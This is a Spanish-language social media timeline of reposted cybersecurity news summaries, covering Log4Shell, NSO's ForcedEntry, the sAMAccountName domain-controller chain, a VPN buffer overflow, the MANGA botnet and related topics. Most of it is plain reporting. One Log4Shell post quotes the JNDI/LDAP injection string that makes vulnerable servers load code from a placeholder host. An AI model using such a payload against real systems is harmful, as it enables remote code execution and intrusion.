Arfran (obiolsfriendica@libranet.de)'s status on Saturday, 15-Jan-2022 22:48:05 UTC
Arfran♲ @asrafil@pod.geraspora.de:#RaspberryPi puede encontrar #malware en un dispositivo gracias a ondas electromagnéticas y sin usar software adicional Una Raspberry Pi puede identificar malware con ondas electromagnéticas y sin utilizar software adicional. Un equipo de investigadores del Instituto de Investigación de Ciencias Informáticas y Sistemas Aleatorios (IRISA o Institute of Computer Science and Random Systems) de Francia ha publicado un nuevo artículo en el que se detalla cómo han logrado esta hazaña.
A diferencia de otros sistemas de detección de malware que se basan en el software, el nuevo sistema de IRISA utiliza un osciloscopio (Picoscope 6407) y una sonda H-Field, además de una Raspberry Pi 2B, para escanear dispositivos en busca de ondas electromagnéticas (EM) específicas.www.genbeta.com/actualidad/ras… #Ñ#seguridad
Arfran (obiolsfriendica@libranet.de)'s status on Saturday, 15-Jan-2022 22:48:05 UTC
Arfran♲ @asrafil@pod.geraspora.de:#RaspberryPi puede encontrar #malware en un dispositivo gracias a ondas electromagnéticas y sin usar software adicional Una Raspberry Pi puede identificar malware con ondas electromagnéticas y sin utilizar software adicional. Un equipo de investigadores del Instituto de Investigación de Ciencias Informáticas y Sistemas Aleatorios (IRISA o Institute of Computer Science and Random Systems) de Francia ha publicado un nuevo artículo en el que se detalla cómo han logrado esta hazaña.
A diferencia de otros sistemas de detección de malware que se basan en el software, el nuevo sistema de IRISA utiliza un osciloscopio (Picoscope 6407) y una sonda H-Field, además de una Raspberry Pi 2B, para escanear dispositivos en busca de ondas electromagnéticas (EM) específicas.www.genbeta.com/actualidad/ras… #Ñ#seguridad
"Internet está en llamas": #Cloudflare ha detectado más de 24.600 ataques por minuto que explotaban la vulnerabilidad #Log4Shell
De la grave vulnerabilidad Log4Shell (que afecta a la librería open source Log4J permitiendo ataques de ejecución de código remoto) hemos hablado ya en esta última semana: desde las condiciones en que trabajan los desarrolladores encargados de parchearla, hasta la presencia de la vulnerabilidad en uno de los vehículos de la NASA que está explorando ahora mismo marte.
El problema al que se enfrenta Internet con Log4Shell es que al contrario que otros #ciberataques relevantes de los últimos tiempos, que afectaban a un número limitado de productos de software (en muchos casos sólo a uno), Log4j está integrado en prácticamente cada servicio web basado en Java.
Todos los ciberdelincuentes del mundo, a la caza de exploits
Explotación de CVE-2021-42278 y CVE-2021-42287 para ownear el DA con cualquier usuario de dominio
En medio de la tormenta #Log4Shell hay una cadena de vulnerabilidades (NoPaC, sAMAccountName) que está pasando algo desapercibida pero mediante la cual cualquier persona dentro de la red podría usar para ownear un DC. Hablamos de CVE-2021-42287 y CVE-2021-42278...
Ventajas e inconvenientes de abrir puertos usando #DMZ
En la mayoría de ocasiones para realizar nuestras tareas cotidianas en Internet no necesitamos hacer nada especial. Un ejemplo claro de esto es la navegación web que realizamos utilizando nuestros navegadores en diferentes sistemas operativos y equipos. No obstante, algunos programas P2P, cuando quieres montar algún servidor web o FTP y también algunos juegos de videoconsolas requieren que se abran unos puertos concretos. En caso de no hacerlo podremos experimentar una bajada de rendimiento importante como en los programas P2P e incluso que no funcionen. Entonces podremos optar por dos estrategias bien diferenciadas. Una sería abrir únicamente los puertos que necesitamos y otra utilizar DMZ. En este artículo vamos a ver las ventajas e inconvenientes de abrir puertos usando DMZ.
Quizás en alguna ocasión es posible que hayas tenido que entrar a la configuración del router para cambiar la clave del Wi-Fi u otra tarea y en alguno de sus apartados hayas visto escrito DMZ. En ese aspecto, nos encontramos con una forma de abrir puertos usando DMZ, que tiene sus particularidades, y también peligros. A continuación, vamos a ver qué es y luego veremos sus ventajas e inconvenientes.
Google descubre un #exploit muy avanzado que ataca a los #iPhone: "es un arma contra la que no hay defensa"
Project Zero de Google, el equipo que busca mejorar la seguridad en internet desde su nacimiento en 2014, ha descubierto un exploit muy potente. Dicen los investigadores que es "uno de los exploits más sofisticados técnicamente que hemos visto jamás, y que está al nivel de ataques de los espías de las naciones-estado más avanzadas".
ForcedEntry para iOS ha sido desarrollado por el grupo de hackers israelí NSO Group. Cabe recordar aquí que 'NSO Group' es una empresa israelí responsable del desarrollo de Pegasus (spyware con el que, supuestamente, se hackeó a Jeff Bezos), así como de código capaz de instalar spyware en aplicaciones como WhatsApp.
Detectaron una vulnerabilidad que afecta a más de 10,000 servidores #vpn | Desde Linux
Hace poco un grupo de investigadores dieron a conocer una vulnerabilidad con una clasificación de gravedad de 9,8 sobre 10, esto después de que dieran 1 año de gracia antes de que divulgarán dicha información.
Se menciona que aproximadamente 10,000 servidores corporativos que utilizan la VPN afectada.
Se ha demostrado que aproximadamente 10,000 servidores corporativos que utilizan Palo Alto Networks GlobalProtect VPN son vulnerables a un error de desbordamiento de búfer que se solucionó solo 12 meses después del descubrimiento.
La vulnerabilidad identificada por CVE-2021-3064 A es de 9,8 sobre 10 y se produce cuando se escanea la entrada proporcionada por el usuario en una ubicación de longitud fija en la pila.
Una segunda vulnerabilidad de #Log4j obliga a actualizar
En los últimos días hemos sido testigos de una nueva y grave vulnerabilidad que afecta a la popular librería de registro de Java Log4j. En este artículo nos hacemos eco de cómo los piratas informáticos están comenzando a explotar una segunda vulnerabilidad de Log4j. Una vez más, se hace imprescindible que los usuarios actualicen los sistemas y puedan corregir lo antes posible estas vulnerabilidades para evitar así ser víctimas de ataques.
El helicóptero Ingenuity, que sobrevuela desde hace meses la superficie del planeta Marte, ejecutó recientemente su trayecto número 17 (pese a que los planes originales contemplaban únicamente la realización de 5 de ellos). Al contrario que en los dieciséis anteriores, en los que todo fue sobre ruedas, esta vez algo falló…
…la comunicación entre Ingenuity y el rover Perseverance se interrumpió inesperadamente mientras el helicóptero descendía, y han hecho falta varios días para recuperar los datos de telemetría y confirmar que el vuelo fue exitoso (tanto, que estableció un nuevo récord de más de 30 minutos de vuelo).
Este fallo permite a un atacante controlar un sistema con #Ubuntu
Ubuntu es una de las distribuciones de Linux más populares. Una vulnerabilidad afecta a este sistema operativo y pone en riesgo a los usuarios. Se trata de un fallo que permite a un atacante obtener privilegios root y tomar el control total. Esto lo consigue al explotar un error de corrupción de memoria doble libre en el componente AccountsService de GNOME.
#HackMyVM: el sitio libre donde encontrarás máquinas boot2root y más
HackMyVM es una plataforma que ofrece un entorno de entrenamiento y aprendizaje sobre conceptos de seguridad informática totalmente gratuito.
En ella podremos encontrar máquinas virtuales con ciertas vulnerabilidades totalmente diferentes entre ellas, en las que se pueden llegar a aprender conceptos tales como exploits, cifrados, cross-site scripting, ingeniería inversa, inyecciones SQL, inyección de código, etc...
Estamos hablando de una cantidad a día de hoy de 135 máquinas a nuestra disposición, por lo que nada tiene que envidiar a otras plataformas del sector.
Algo a destacar es que estas máquinas, las cuales van apareciendo continuamente, son creadas por los propios usuarios. Lo que hace que se forme una gran comunidad y un muy buen ambiente.
La nueva función antiespionaje de #WhatsApp no acabará con el problema: esto es lo que pueden hacer con “En línea”
Hoy hemos amanecido con la noticia de que WhatsApp ha implementado una nueva función de privacidad por defecto, por la cual se limitará mucho quién puede ver nuestro estado "En línea". Con esta medida, además, se dice adiós a las webs y servicios que sirven exclusivamente para espiar este estado y contabilizar cuánto tiempo pasa en línea una persona y cuántas veces al día se conecta.
Esta nueva política de WhatsApp es algo a aplaudir, pues de un plumazo acaba con uno de los puntos más problemáticos de la privacidad en la plataforma de mensajería. Sin embargo, atendiendo a los detalles técnicos que han aportado, sigue sin ser suficiente cuando tenemos en cuenta la toxicidad que puede llegar a existir en la cabeza de las personas.
#RCE en #Log4j (#log4shell): sencillo de explotar y presente en numerosas apps
Recientemente se ha publicado un exploit de día 0 en log4j, la popular librería de Java desarrollada por la Apache Foundation que da como resultado la ejecución remota de código (RCE) al loggear una determinada cadena con la sintaxis ${jndi:ldap://servidor_dns/exp}. Así de sencillo:
#Log4Shell: conoce si eres vulnerable y soluciona este grave fallo
Log4Shell es la última vulnerabilidad que trae de cabeza a muchos administradores que han visto cómo sus servidores son vulnerables a ataques remotos. Se trata de un fallo de seguridad severo, que puede ser explotado de una manera sencilla. Además, puede afectar a una gran cantidad de usuarios. Se ha descubierto que afecta a servicios en la nube como Apple iCloud o Steam. En este artículo explicamos qué es exactamente, cómo funciona y por supuesto qué hacer para solucionar este problema.
Tres desarrolladores que trabajan gratis han evitado pérdidas millonarias a algunas de las mayores compañías tecnológicas del mundo
La difusión el pasado jueves de una vulnerabilidad 'zero day' que afecta potencialmente a millones de usuarios de cientos de populares servicios online (de Minecraft a iCloud, pasando por Steam, Cloudflare, etcétera) ha obligado administradores de todo el mundo a realizar actualizaciones urgentes para cerrarles las puertas a los cibercriminales.
La vulnerabilidad, conocida como 'CVE-2021-44228' o 'Log4Shell', fue descubierta por Chen Zhaojun (ingeniero de software de Alibaba), y afecta a Apache Log4j, una biblioteca open source desarrollada por la Apache Foundation que facilita a aplicaciones del ecosistema Java mantener un registro de actividades realizadas en tiempo de ejecución.
Por ahora, la vulnerabilidad se ha usado sobre todo para difundir malware de criptominado, pero dado que permite la ejecución remota de código en varias de las aplicaciones web más populares, sus efectos si éstas no la parchean inmediatamente pueden ser mucho más graves.
De hecho, se le ha asignado un 10/10 en el CVSS (Common Vulnerability Scoring System), un estándar de medición de la gravedad de vulnerabilidades, y en estos días se ha detectado actividad sospechosa (mayoritariamente procedente de la red Tor) escaneando masivamente la presencia de esta vulnerabilidad en servidores web.
#Confianzacero: ¿es una buena solución para el ransomware?
Estamos en una época de transición hacia un mundo cada vez más digital. Las soluciones tradicionales que hasta hace unos años era útiles ahora ya no lo son. El auge del teletrabajo y el trabajo en la nube han cambiado nuestra forma de trabajar. Ahora podemos acceder a los archivos desde cualquier lugar pero eso implica también unos cambios en cuanto a materia de seguridad. En ese aspecto las organizaciones deben adaptarse a la nueva realidad. Las empresas de ciberseguridad están lanzando un nuevo concepto de confianza cero, ¿es una buena solución para protegernos de los peligros del ransomware?
El equipo de FortiGuard Labs ha encontrado diferentes muestras de malware que se está distribuyendo de forma masiva, con el objetivo de atacar a los routers de TP-Link afectados por una vulnerabilidad RCE que se ha hecho pública hace unas dos semanas. La nueva botnet denominada como MANGA, que está basada en la popular botnet Dark-Mirai, se centra específicamente en este tipo de dispositivos de TP-Link vulnerables para seguir atacando. El equipo de FortiGuard Labs le ha llamado la atención que tienen una actualización contínua de nuevas vulnerabilidades, más que otras campañas de malware que hayan visto hasta el momento.
Esta nueva variante del malware distribuye muestras basadas en el código fuente publicado de Mirai, debemos recordar que la botnet Mirai realiza ataques distribuidos de denegación de servicio (DDoS) a gran escala, y esta botnet ha estado monitorizada por FortiGuard Labs durante mucho tiempo.
Los hacks en Google Cloud se utilizan para el minado de criptomonedas
Cada vez es más frecuente que tengamos más cosas almacenadas en la nube. Nos brinda la posibilidad de acceder a nuestros contenidos personales y de trabajo desde cualquier lugar. Lo único que necesitamos es una conexión a Internet para poder trabajar con nuestros servicios en la nube. Los ciberdelincuentes siempre andan buscando beneficios y los han encontrado vulnerando las cuentas de Google Cloud. En este artículo vamos a ver cómo los hacks en Google Cloud se utilizan para el minado ilegal de criptomonedas.